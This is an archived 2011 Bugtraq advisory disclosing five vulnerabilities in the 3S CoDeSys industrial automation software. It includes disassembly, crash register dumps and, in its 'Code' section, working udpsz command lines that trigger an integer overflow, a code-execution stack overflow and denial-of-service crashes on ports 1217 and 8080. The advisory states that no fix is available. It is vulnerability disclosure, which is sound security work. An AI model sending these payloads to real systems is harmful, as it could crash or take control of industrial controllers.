lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20111129181242.d97cee5c.aluigi@autistici.org>
Date: Tue, 29 Nov 2011 18:12:42 +0000
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com
Subject: Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2

#######################################################################

                             Luigi Auriemma

Application:  3S CoDeSys
              http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions:     <= 3.4 SP4 Patch 2
Platforms:    Windows
Bugs:         A] GatewayService integer overflow
              B] CmpWebServer stack overflow
              C] CmpWebServer Content-Length NULL pointer
              D] CmpWebServer invalid HTTP request NULL pointer
              E] CmpWebServer folders creation
Exploitation: remote
Date:         29 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@...istici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


>From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."


#######################################################################

=======
2) Bugs
=======


----------------------------------
A] GatewayService integer overflow
----------------------------------

GatewayService uses a 32bit value at offset 0x0c of the header which
specifies the size of the data to receive.
The program takes this number, adds 0x34 and allocates that amount of
memory resulting in an integer overflow:

  0042CB30  /$ 55             PUSH EBP
  0042CB31  |. 8BEC           MOV EBP,ESP
  0042CB33  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]
  0042CB36  |. 83C0 34        ADD EAX,34
  0042CB39  |. 5D             POP EBP
  0042CB3A  \. C3             RETN
  ...
  00447AF7  |. 8B45 0C        MOV EAX,DWORD PTR SS:[EBP+C]
  00447AFA  |. 50             PUSH EAX
  00447AFB  |. E8 3050FEFF    CALL GatewayS.0042CB30        ; + 0x34
  00447B00  |. 83C4 04        ADD ESP,4
  00447B03  |. 8945 0C        MOV DWORD PTR SS:[EBP+C],EAX
  00447B06  |> 6A 01          PUSH 1
  00447B08  |. 8B4D 0C        MOV ECX,DWORD PTR SS:[EBP+C]
  00447B0B  |. 51             PUSH ECX
  00447B0C  |. E8 A7050200    CALL GatewayS.004680B8        ; allocation


------------------------------
B] CmpWebServer stack overflow
------------------------------

CmpWebServer is the component used in services like 3SRTESrv3 and
CoDeSysControlService for handling the HTTP connections on port 8080.

The library is affected by a buffer overflow in the function 0040f480
that copies the input URI in a limited stack buffer allowing code
execution:

  0040F5C5  |> 8B55 F4        MOV EDX,DWORD PTR SS:[EBP-C]
  0040F5C8  |. 2B55 08        SUB EDX,DWORD PTR SS:[EBP+8]
  0040F5CB  |. 52             PUSH EDX
  0040F5CC  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]
  0040F5CF  |. 50             PUSH EAX
  0040F5D0  |. 8B4D 10        MOV ECX,DWORD PTR SS:[EBP+10]
  0040F5D3  |. 51             PUSH ECX
  0040F5D4  |. E8 97420000    CALL CoDeSysC.00413870    ; memcpy


-------------------------------------------
C] CmpWebServer Content-Length NULL pointer
-------------------------------------------

NULL pointer caused by the lack of checks on the memory allocated
trusting the Content-Length value of an HTTP POST request:

  eax=812aa3a7 ebx=00a7ae7c ecx=20000000 edx=00000000 esi=012aa3a7 edi=00000000
  eip=0128cc9a esp=02e9feec ebp=02e9fef4 iopl=0         nv up ei pl nz ac po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
  CmpWebServer!ComponentEntry+0xb37a:
  0128cc9a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]


-------------------------------------------------
D] CmpWebServer invalid HTTP request NULL pointer
-------------------------------------------------

NULL pointer caused by the usage of an unexpected HTTP request
different than GET, POST or HEAD:

  eax=028228d4 ebx=00000009 ecx=00000004 edx=02822957 esi=00000000 edi=00000005
  eip=0128dd6c esp=02e9fed4 ebp=02e9fee0 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
  CmpWebServer!ComponentEntry+0xc44c:
  0128dd6c 3a51fc          cmp     dl,byte ptr [ecx-4]        ds:0023:00000000=??


--------------------------------
E] CmpWebServer folders creation
--------------------------------

Not a security bug (at least at the moment) but enough weird and funny
to note.
The webserver calls CreateDirectory at address 0041206d before doing a
secondary CreateFile (read mode).
The only possible attack scenario I can imagine may be in case the
server automatically generates logs or other files and this bug will
prevent their creation due to the presence of folders with the same
names, but I don't know the software enough to confirm this scenario.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

A]
  udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff

B]
  udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192

C]
  udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

D]
  udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

E]
  udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  ...


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ